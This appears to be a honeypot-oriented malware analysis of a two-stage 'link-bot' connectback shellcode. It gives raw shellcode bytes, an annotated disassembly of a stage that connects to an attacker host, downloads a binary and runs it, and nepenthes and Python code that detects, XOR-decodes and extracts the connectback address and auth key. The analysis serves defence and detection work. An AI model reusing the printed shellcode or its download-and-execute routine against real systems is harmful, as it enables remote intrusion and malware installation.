,0xf6,0x2b,0xca,0x75,0xe9,0x58,0x2b,0xd8,0xd1,0xeb,0x5e,0x03,0x5e,0x24,0x03,0xdf
,0x66,0x8b,0x0b,0x8b,0x5e,0x1c,0x03,0xdf,0x8b,0x04,0x8b,0x03,0xc7,0x5e,0x5b,0xff
,0xe0,0x5e,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0xba,0x92,0x6e
,0x04,0x84,0xff,0xd6,0x89,0x45,0x0c,0x8b,0xf8,0x53,0x6a,0x04,0x55,0xff,0x75,0x04
,0xba,0x00,0x90,0x66,0xe0,0xff,0xd6,0x83,0xf8,0x04,0x0f,0x85,0xc5,0x00,0x00,0x00
,0x8b,0x7d,0x08,0xe8,0x0d,0x00,0x00,0x00,0x69,0x70,0x6c,0x66,0x2e,0x65,0x78,0x65
,0x00,0x00,0x00,0x00,0x00,0x8f,0x45,0x18,0x53,0x6a,0x02,0x6a,0x01,0x53,0x53,0x68
,0x00,0x00,0x00,0xc0,0xff,0x75,0x18,0xba,0x3d,0xd3,0x6b,0x5c,0xff,0xd6,0x89,0x45
,0x1c,0x40,0x0f,0x84,0x8d,0x00,0x00,0x00,0x8b,0x7d,0x0c,0x33,0xc0,0x50,0xb4,0x02
,0x50,0xff,0x75,0x14,0xff,0x75,0x04,0xba,0x00,0x58,0x60,0xe2,0xff,0xd6,0x8b,0x7d
,0x08,0x85,0xc0,0x74,0x1e,0x8b,0xc8,0x41,0x74,0x57,0x53,0x8d,0x4d,0x10,0x51,0x50
,0xff,0x75,0x14,0xff,0x75,0x1c,0xba,0xb9,0xbe,0xf5,0xcb,0xff,0xd6,0x85,0xc0,0x74
,0x40,0xeb,0xc5,0xff,0x75,0x1c,0xba,0x5c,0x93,0xc5,0x9d,0xff,0xd6,0x6a,0x44,0x58
,0x2b,0xe0,0x8b,0xfc,0x8b,0xd7,0xab,0x33,0xc0,0x6a,0x10,0x59,0xab,0xe2,0xfd,0x8b
,0x7d,0x08,0x52,0x52,0x50,0x50,0x50,0x50,0x50,0x50,0x50,0xff,0x75,0x18,0xba,0x2c
,0xf1,0x94,0x26,0xff,0xd6,0x58,0xfe,0xc7,0x53,0x50,0xba,0x01,0xd6,0x34,0xde,0xff
,0xd6,0xff,0x75,0x1c,0xba,0x5c,0x93,0xc5,0x9d,0xff,0xd6,0xff,0x75,0x18,0xba,0x3d
,0x53,0xcf,0x27,0xff,0xd6,0x8b,0x7d,0x0c,0xff,0x75,0x04,0xba,0x85,0x56,0x31,0x07
,0xff,0xd6,0x8b,0x7d,0x08,0xba,0xba,0x46,0x0c,0xc1,0xff,0xd6 };
In short: after de-XORing, stage 1 contains a 4-byte authentication key and opens a connectback connection. The attacker then sends stage 2 over this connection (380 more bytes of code). Stage 2 sends the authentication key from stage 1 back; if the key is verified as valid, the attacker streams the binary.
00402018 eb 15           jmp short link-03.0040202f
0040201a b9 8be61341     mov ecx,4113e68b
0040201f 81f1 39e61341   xor ecx,4113e639                     ; ecx = 4113e68b ^ 4113e639 = b2 bytes to decode
00402025 5e              pop esi
00402026 807431 ff 17    xor byte ptr ds:[ecx+esi-1],17       ; xor key 0x17
0040202b ^e2 f9          loopd short link-03.00402026
0040202d eb 05           jmp short link-03.00402034
0040202f e8 e6ffffff     call link-03.0040201a
00402034 33db            xor ebx,ebx
00402036 64:8b43 30      mov eax,dword ptr fs:[ebx+30]
0040203a 8b40 0c         mov eax,dword ptr ds:[eax+c]
0040203d 8b70 1c         mov esi,dword ptr ds:[eax+1c]
00402040 ad              lods dword ptr ds:[esi]
00402041 8b78 08         mov edi,dword ptr ds:[eax+8]
00402044 e8 45000000     call link-03.0040208e
00402049 53              push ebx                             ; ------ syscall finder
0040204a 56              push esi
0040204b 8b5f 3c         mov ebx,dword ptr ds:[edi+3c]
0040204e 8b5c3b 78       mov ebx,dword ptr ds:[ebx+edi+78]
00402052 03df            add ebx,edi
00402054 53              push ebx
00402055 8b5b 20         mov ebx,dword ptr ds:[ebx+20]
00402058 03df            add ebx,edi
0040205a 53              push ebx
0040205b 83c3 04         add ebx,4
0040205e 8b33            mov esi,dword ptr ds:[ebx]
00402060 03f7            add esi,edi
00402062 33c9            xor ecx,ecx
00402064 ac              lods byte ptr ds:[esi]
00402065 32c8            xor cl,al
00402067 c1c1 05         rol ecx,5
0040206a 84c0            test al,al
0040206c ^75 f6          jnz short link-03.00402064
0040206e 2bca            sub ecx,edx
00402070 ^75 e9          jnz short link-03.0040205b
00402072 58              pop eax
00402073 2bd8            sub ebx,eax
00402075 d1eb            shr ebx,1
00402077 5e              pop esi
00402078 035e 24         add ebx,dword ptr ds:[esi+24]
0040207b 03df            add ebx,edi
0040207d 66:8b0b         mov cx,word ptr ds:[ebx]
00402080 8b5e 1c         mov ebx,dword ptr ds:[esi+1c]
00402083 03df            add ebx,edi
00402085 8b048b          mov eax,dword ptr ds:[ebx+ecx*4]
00402088 03c7            add eax,edi
0040208a 5e              pop esi
0040208b 5b              pop ebx
0040208c ffe0            jmp eax
0040208e 5e              pop esi                              ; ------- end
0040208f 68 33320000     push 3233
00402094 68 7773325f     push 5f327377
00402099 54              push esp
0040209a ba 926e0484     mov edx,84046e92
0040209f ffd6            call esi                             ; loadlibrarya()
004020a1 8bf8            mov edi,eax
004020a3 81ec 00020000   sub esp,200
004020a9 8bec            mov ebp,esp
004020ab 53              push ebx
004020ac 6a 01           push 1
004020ae 6a 02           push 2
004020b0 ba 83538300     mov edx,835383
004020b5 ffd6            call esi                             ; socket()
004020b7 53              push ebx
004020b8 53              push ebx
004020b9 68 3e2fd9fe     push fed92f3e
004020be 68 02003c19     push 193c0002                        ; sockaddr_in on the stack: AF_INET, port and IPv4 address in network byte order
004020c3 8bd4            mov edx,esp
004020c5 8bd8            mov ebx,eax
004020c7 6a 10           push 10
004020c9 52              push edx
004020ca 53              push ebx
004020cb ba 6330605a     mov edx,5a603063
004020d0 ffd6            call esi                             ; connect()
004020d2 50              push eax
004020d3 b4 02           mov ah,2
004020d5 50              push eax
004020d6 55              push ebp
004020d7 53              push ebx
004020d8 ba 005860e2     mov edx,e2605800
004020dd ffd6            call esi                             ; recv()
004020df bf acac0685     mov edi,8506acac                     ; ! this is the auth key
004020e4 ffe5            jmp ebp                              ; jump to stage 2

0040229a 83ec 20         sub esp,20
0040229d 8bec            mov ebp,esp
0040229f 895d 04         mov dword ptr ss:[ebp+4],ebx
004022a2 897d 00         mov dword ptr ss:[ebp],edi           ; save auth key in [ebp]
004022a5 81ec 00020000   sub esp,200
004022ab 8965 14         mov dword ptr ss:[ebp+14],esp
004022ae 33db            xor ebx,ebx
004022b0 64:8b43 30      mov eax,dword ptr fs:[ebx+30]
004022b4 8b40 0c         mov eax,dword ptr ds:[eax+c]
004022b7 8b70 1c         mov esi,dword ptr ds:[eax+1c]
004022ba ad              lods dword ptr ds:[esi]
004022bb 8b78 08         mov edi,dword ptr ds:[eax+8]
004022be 897d 08         mov dword ptr ss:[ebp+8],edi
004022c1 e8 45000000     call link-03.0040230b
004022c6 53              push ebx                             ; ----- syscall lookup fn
004022c7 56              push esi
004022c8 8b5f 3c         mov ebx,dword ptr ds:[edi+3c]
004022cb 8b5c3b 78       mov ebx,dword ptr ds:[ebx+edi+78]
004022cf 03df            add ebx,edi
004022d1 53              push ebx
004022d2 8b5b 20         mov ebx,dword ptr ds:[ebx+20]
004022d5 03df            add ebx,edi
004022d7 53              push ebx
004022d8 83c3 04         add ebx,4
004022db 8b33            mov esi,dword ptr ds:[ebx]
004022dd 03f7            add esi,edi
004022df 33c9            xor ecx,ecx
004022e1 ac              lods byte ptr ds:[esi]
004022e2 32c8            xor cl,al
004022e4 c1c1 05         rol ecx,5
004022e7 84c0            test al,al
004022e9 ^75 f6          jnz short link-03.004022e1
004022eb 2bca            sub ecx,edx
004022ed ^75 e9          jnz short link-03.004022d8
004022ef 58              pop eax
004022f0 2bd8            sub ebx,eax
004022f2 d1eb            shr ebx,1
004022f4 5e              pop esi
004022f5 035e 24         add ebx,dword ptr ds:[esi+24]
004022f8 03df            add ebx,edi
004022fa 66:8b0b         mov cx,word ptr ds:[ebx]
004022fd 8b5e 1c         mov ebx,dword ptr ds:[esi+1c]
00402300 03df            add ebx,edi
00402302 8b048b          mov eax,dword ptr ds:[ebx+ecx*4]
00402305 03c7            add eax,edi
00402307 5e              pop esi
00402308 5b              pop ebx
00402309 ffe0            jmp eax                              ; ------
0040230b 5e              pop esi
0040230c 68 33320000     push 3233
00402311 68 7773325f     push 5f327377
00402316 54              push esp
00402317 ba 926e0484     mov edx,84046e92
0040231c ffd6            call esi                             ; loadlibrarya()
0040231e 8945 0c         mov dword ptr ss:[ebp+c],eax
00402321 8bf8            mov edi,eax
00402323 53              push ebx                             ; int flags
00402324 6a 04           push 4                               ; int len
00402326 55              push ebp                             ; const void *buf (auth key from stage 1)
00402327 ff75 04         push dword ptr ss:[ebp+4]            ; int s
0040232a ba 009066e0     mov edx,e0669000
0040232f ffd6            call esi                             ; send()
00402331 83f8 04         cmp eax,4
00402334 0f85 c5000000   jnz link-03.004023ff
0040233a 8b7d 08         mov edi,dword ptr ss:[ebp+8]
0040233d e8 0d000000     call link-03.0040234f                ; the call skips the inline filename string that follows; its address is popped at 0040234f
00402342 6377 64         arpl word ptr ds:[edi+64],si         ; 00402342-0040234e are the string bytes, shown here as (meaningless) code
00402345 6f              outs dx,dword ptr es:[edi]           ; i/o command
00402346 7a 2e           jpe short link-03.00402376
00402348 65:78 65        js short link-03.004023b0            ; superfluous prefix
0040234b 0000            add byte ptr ds:[eax],al
0040234d 0000            add byte ptr ds:[eax],al
0040234f 8f45 18         pop dword ptr ss:[ebp+18]            ; ---- reply sent
00402352 53              push ebx
00402353 6a 02           push 2
00402355 6a 01           push 1
00402357 53              push ebx
00402358 53              push ebx
00402359 68 000000c0     push c0000000
0040235e ff75 18         push dword ptr ss:[ebp+18]
00402361 ba 3dd36b5c     mov edx,5c6bd33d
00402366 ffd6            call esi                             ; createfilea
00402368 8945 1c         mov dword ptr ss:[ebp+1c],eax
0040236b 40              inc eax
0040236c 0f84 8d000000   je link-03.004023ff                  ; errorhandling
00402372 8b7d 0c         mov edi,dword ptr ss:[ebp+c]
00402375 33c0            xor eax,eax
00402377 50              push eax
00402378 b4 02           mov ah,2
0040237a 50              push eax
0040237b ff75 14         push dword ptr ss:[ebp+14]
0040237e ff75 04         push dword ptr ss:[ebp+4]
00402381 ba 005860e2     mov edx,e2605800
00402386 ffd6            call esi                             ; recv()
00402388 8b7d 08         mov edi,dword ptr ss:[ebp+8]
0040238b 85c0            test eax,eax
0040238d 74 1e           je short link-03.004023ad            ; u!
0040238f 8bc8            mov ecx,eax
00402391 41              inc ecx
00402392 74 57           je short link-03.004023eb            ; errorhandling
00402394 53              push ebx
00402395 8d4d 10         lea ecx,dword ptr ss:[ebp+10]
00402398 51              push ecx
00402399 50              push eax
0040239a ff75 14         push dword ptr ss:[ebp+14]
0040239d ff75 1c         push dword ptr ss:[ebp+1c]
004023a0 ba b9bef5cb     mov edx,cbf5beb9
004023a5 ffd6            call esi                             ; writes the received bytes to the file: WriteFile(hFile, buf, len, &written, 0), inferred from the argument layout
004023a7 85c0            test eax,eax
004023a9 74 40           je short link-03.004023eb
004023ab ^eb c5          jmp short link-03.00402372
004023ad ff75 1c         push dword ptr ss:[ebp+1c]
004023b0 ba 5c93c59d     mov edx,9dc5935c
004023b5 ffd6            call esi                             ; same hash as closehandle() below
004023b7 6a 44           push 44
004023b9 58              pop eax
004023ba 2be0            sub esp,eax
004023bc 8bfc            mov edi,esp
004023be 8bd7            mov edx,edi
004023c0 ab              stos dword ptr es:[edi]              ; 0x44-byte struct on the stack, first dword 0x44, rest zeroed (looks like STARTUPINFO.cb)
004023c1 33c0            xor eax,eax
004023c3 6a 10           push 10
004023c5 59              pop ecx
004023c6 ab              stos dword ptr es:[edi]
004023c7 ^e2 fd          loopd short link-03.004023c6
004023c9 8b7d 08         mov edi,dword ptr ss:[ebp+8]
004023cc 52              push edx
004023cd 52              push edx
004023ce 50              push eax
004023cf 50              push eax
004023d0 50              push eax
004023d1 50              push eax
004023d2 50              push eax
004023d3 50              push eax
004023d4 50              push eax
004023d5 ff75 18         push dword ptr ss:[ebp+18]
004023d8 ba 2cf19426     mov edx,2694f12c
004023dd ffd6            call esi                             ; ten arguments, filename first: CreateProcessA, inferred from the argument layout
004023df 58              pop eax
004023e0 fec7            inc bh
004023e2 53              push ebx
004023e3 50              push eax
004023e4 ba 01d634de     mov edx,de34d601
004023e9 ffd6            call esi
004023eb ff75 1c         push dword ptr ss:[ebp+1c]
004023ee ba 5c93c59d     mov edx,9dc5935c
004023f3 ffd6            call esi                             ; closehandle()
004023f5 ff75 18         push dword ptr ss:[ebp+18]
004023f8 ba 3d53cf27     mov edx,27cf533d
004023fd ffd6            call esi                             ; deletefilea()
004023ff 8b7d 0c         mov edi,dword ptr ss:[ebp+c]         ; --- error handling
00402402 ff75 04         push dword ptr ss:[ebp+4]
00402405 ba 85563107     mov edx,7315685
0040240a ffd6            call esi                             ; closesocket()
0040240c 8b7d 08         mov edi,dword ptr ss:[ebp+8]
0040240f ba ba460cc1     mov edx,c10c46ba
00402414 ffd6            call esi                             ; exitthread()
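The resolver loop at 0040204b-0040208c (and its copy in stage 2 at 004022c8) walks the export table of the module in edi and hashes each name with xor cl,al / rol ecx,5 over every byte, including the terminating NUL, until the result equals the constant that was loaded into edx. The Python below is an added example, not code from this page or from nepenthes: it reimplements that hash, pulls the imm32 of every `mov edx,imm32 ; call esi` pair out of a code blob, and resolves each against a candidate list of export names. The candidate list is an assumption (the APIs this kind of shellcode typically needs), so a constant that matches none of them is reported as unresolved rather than guessed. The sample blob is constructed from three call sites copied out of the stage-1 listing.

```python
import re
import struct


def api_hash(name: str) -> int:
    """Export-name hash used by the resolver loop in the listing:
    lods byte / xor cl,al / rol ecx,5 / test al,al / jnz.
    Every byte of the name, including the terminating NUL, is folded in."""
    h = 0
    for b in name.encode("ascii") + b"\x00":
        h ^= b                                    # xor cl,al
        h = ((h << 5) | (h >> 27)) & 0xFFFFFFFF   # rol ecx,5
    return h


# Assumption: the export names a stage-1 / stage-2 shellcode of this kind
# is likely to call. Extend the list when analysing other samples.
CANDIDATES = [
    "LoadLibraryA", "GetProcAddress", "CreateFileA", "WriteFile", "CloseHandle",
    "DeleteFileA", "CreateProcessA", "WaitForSingleObject", "ExitThread",
    "ExitProcess", "WinExec", "socket", "connect", "recv", "send", "closesocket",
    "WSASocketA", "bind", "listen", "accept",
]
HASH_TABLE = {api_hash(n): n for n in CANDIDATES}

# mov edx,imm32 ; call esi  -- the call sequence the listing uses throughout
CALL_RE = re.compile(rb"\xBA(.{4})\xFF\xD6", re.DOTALL)


def extract_hash_constants(code: bytes) -> list:
    """Return every imm32 loaded into edx directly before a 'call esi'."""
    return [struct.unpack("<I", m.group(1))[0] for m in CALL_RE.finditer(code)]


def resolve(constant: int):
    """Name for a hash constant, or None when no candidate hashes to it."""
    return HASH_TABLE.get(constant)


def resolve_all(code: bytes) -> list:
    """(constant, name-or-None) for every call site found in `code`."""
    return [(c, resolve(c)) for c in extract_hash_constants(code)]


# Constructed sample: three call sites copied from the stage-1 listing
# (the LoadLibraryA, connect and recv calls), nothing else.
SAMPLE = bytes.fromhex(
    "6833320000687773325f54" "ba926e0484ffd6"   # push 'ws2_32' ; mov edx,84046e92 ; call esi
    "6a105253" "ba6330605affd6"                 # push 10 ; push edx ; push ebx ; mov edx,5a603063 ; call esi
    "50b402505553" "ba005860e2ffd6"             # push eax ; mov ah,2 ; ... ; mov edx,e2605800 ; call esi
)

if __name__ == "__main__":
    for c, name in resolve_all(SAMPLE):
        print(f"{c:08x} -> {name or '<unresolved>'}")
```

Run against the full stage-2 bytes instead of the constructed sample, the same two functions label each call site in the listing; any constant that stays unresolved simply means the name is not in the candidate list.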
The code that detects the link-bot XOR decoder and decodes the payload:
const char *xorpcre = "^.*\\xEB\\x15\\xB9\\x8B\\xE6\\x13\\x41\\x81\\xF1\\x39\\xE6\\x13\\x41\\x5E\\x80\\x74\\x31\\xFF(.)\\xE2\\xF9\\xEB\\x05\\xE8\\xE6\\xFF\\xFF\\xFF(.*)$";

/* group 1 = the XOR key byte, group 2 = the encoded bytes that follow the stub */
pcre_get_substring((char *)shellcode, offvec, result, 1, &key);
payloadLen = offvec[5] - offvec[4];
payload = (unsigned char *)malloc(payloadLen);
memcpy(payload, shellcode + offvec[4], payloadLen);
/* decode a fixed maximum of 0xb1 bytes with the key */
for (uint i = 0; i < 0xb1 && i < payloadLen; i++)
    payload[i] ^= *key;
logDebug("Detected link-bot XOR decoder, key is 0x%x, payload is 0x%x bytes long.\n", *((unsigned char *)key), payloadLen);
pcre_free_substring(key);
The code to find the IP and port to connect back to (sch_dcom_linktrans):
const char *pcre = ".*(\\x33\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x78\\x08.*\\x59\\x1c).*";

/* pcre_exec() takes the ovector size in ints, not in bytes */
if ((iResult = pcre_exec(m_pcre, 0, (char *)shellcode, len, 0, 0, piOutput, sizeof(piOutput) / sizeof(piOutput[0]))) > 0) {
    const char *pCode;
    int usPort;
    unsigned long ulHost;
    unsigned int foo = pcre_get_substring((char *)shellcode, piOutput, iResult, 1, &pCode);
    // (*msg)->getSocket()->getNepenthes()->getUtilities()->hexdump((unsigned char *)pCode, foo);
    ulHost = *((unsigned long *)&pCode[134]);   /* IPv4 address pushed as imm32, network byte order */
    memcpy(&usPort, shellcode + 141, 4);        /* AF_INET / port dword pushed right after it */
    logInfo("Link Connectback Transferr on %s:%i %i (%i <-> %i)\n", inet_ntoa(*(in_addr *)&ulHost), usPort, ntohs(usPort), foo, (*msg)->getMsgLen());
}
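Both snippets above hard-code what this one sample tells us: the XOR loop length (0xb1) and the offsets (134 and 141) at which the IP and port sit inside the matched code. The Python below is an added example, not nepenthes code: it captures the two immediates of the decoder stub and uses their XOR (ecx after `xor ecx,imm`) as the loop count, decodes exactly that many bytes as the stub would, and then pulls the connectback sockaddr (`push ip ; push AF_INET/port`) and the 4-byte key that stage 1 hands to stage 2 (`mov edi,imm32 ; jmp ebp`) out of the decoded payload by pattern rather than by fixed offset, so a variant with a longer NOP sled or a different loop length still decodes. The sample is constructed: the stub bytes from the listing, followed by a stage-1 fragment XORed with key 0x17; the regexes and function names are mine.

```python
import re
import socket
import struct

# Decoder stub from the listing: jmp +15 / mov ecx,imm32 / xor ecx,imm32 /
# pop esi / xor byte [ecx+esi-1],key / loopd / jmp +5 / call back.
# The two immediates and the key byte are captured, not hard-coded.
DECODER_RE = re.compile(
    rb"\xEB\x15\xB9(.{4})\x81\xF1(.{4})\x5E\x80\x74\x31\xFF(.)"
    rb"\xE2\xF9\xEB\x05\xE8\xE6\xFF\xFF\xFF",
    re.DOTALL,
)
# push imm32 (IPv4, network order) ; push imm32 (AF_INET=2, port in network order)
CONNECTBACK_RE = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.DOTALL)
# mov edi,imm32 ; jmp ebp  -> the 4 bytes stage 2 sends back as the auth reply
AUTHKEY_RE = re.compile(rb"\xBF(.{4})\xFF\xE5", re.DOTALL)


def decode_payload(blob: bytes):
    """Locate the XOR decoder; return (key, count, decoded bytes) or None.
    Only `count` bytes after the stub are decoded, exactly like the loop;
    anything beyond that is left as it is."""
    m = DECODER_RE.search(blob)
    if m is None:
        return None
    imm_mov = struct.unpack("<I", m.group(1))[0]
    imm_xor = struct.unpack("<I", m.group(2))[0]
    count = imm_mov ^ imm_xor        # ecx after 'xor ecx,imm' = bytes to decode
    key = m.group(3)[0]
    payload = bytearray(blob[m.end():])
    for i in range(min(count, len(payload))):
        payload[i] ^= key
    return key, count, bytes(payload)


def extract_connectback(decoded: bytes):
    """(host, port) from the sockaddr_in pushed before connect(), or None."""
    m = CONNECTBACK_RE.search(decoded)
    if m is None:
        return None
    host = socket.inet_ntoa(m.group(1))
    port = struct.unpack(">H", m.group(2))[0]   # sin_port is big-endian
    return host, port


def extract_auth_key(decoded: bytes):
    """The 4 key bytes in memory order, i.e. exactly what stage 2 send()s."""
    m = AUTHKEY_RE.search(decoded)
    return None if m is None else m.group(1)


def analyse_sample(blob: bytes) -> dict:
    dec = decode_payload(blob)
    if dec is None:
        return {"decoder": False}
    key, count, payload = dec
    return {
        "decoder": True,
        "xor_key": key,
        "decoded_len": count,
        "connectback": extract_connectback(payload),
        "auth_key": extract_auth_key(payload),
    }


# --- constructed sample (not a real capture) ------------------------------
DECODER_STUB = bytes.fromhex("eb15b98be6134181f139e613415e807431ff17e2f9eb05e8e6ffffff")
STAGE1_PLAIN = (
    bytes.fromhex("33db648b43308b400c8b701cad8b7808")   # PEB walk prologue
    + bytes.fromhex("683e2fd9fe6802003c19")             # push ip ; push af/port
    + bytes.fromhex("bfacac0685ffe5")                   # mov edi,key ; jmp ebp
).ljust(0xB2, b"\x90")                                  # pad to the loop count


def build_sample(key: int = 0x17) -> bytes:
    """NOP sled + decoder stub + stage 1 XORed with `key`."""
    encoded = bytes(b ^ key for b in STAGE1_PLAIN)
    return b"\x90" * 16 + DECODER_STUB + encoded


SAMPLE = build_sample()

if __name__ == "__main__":
    print(analyse_sample(SAMPLE))
```

For a honeypot the two extracted values are what matter: the host and port tell it where the victim would have connected, and `auth_key` is the reply it must send after receiving stage 2 if it wants the attacker to stream the binary.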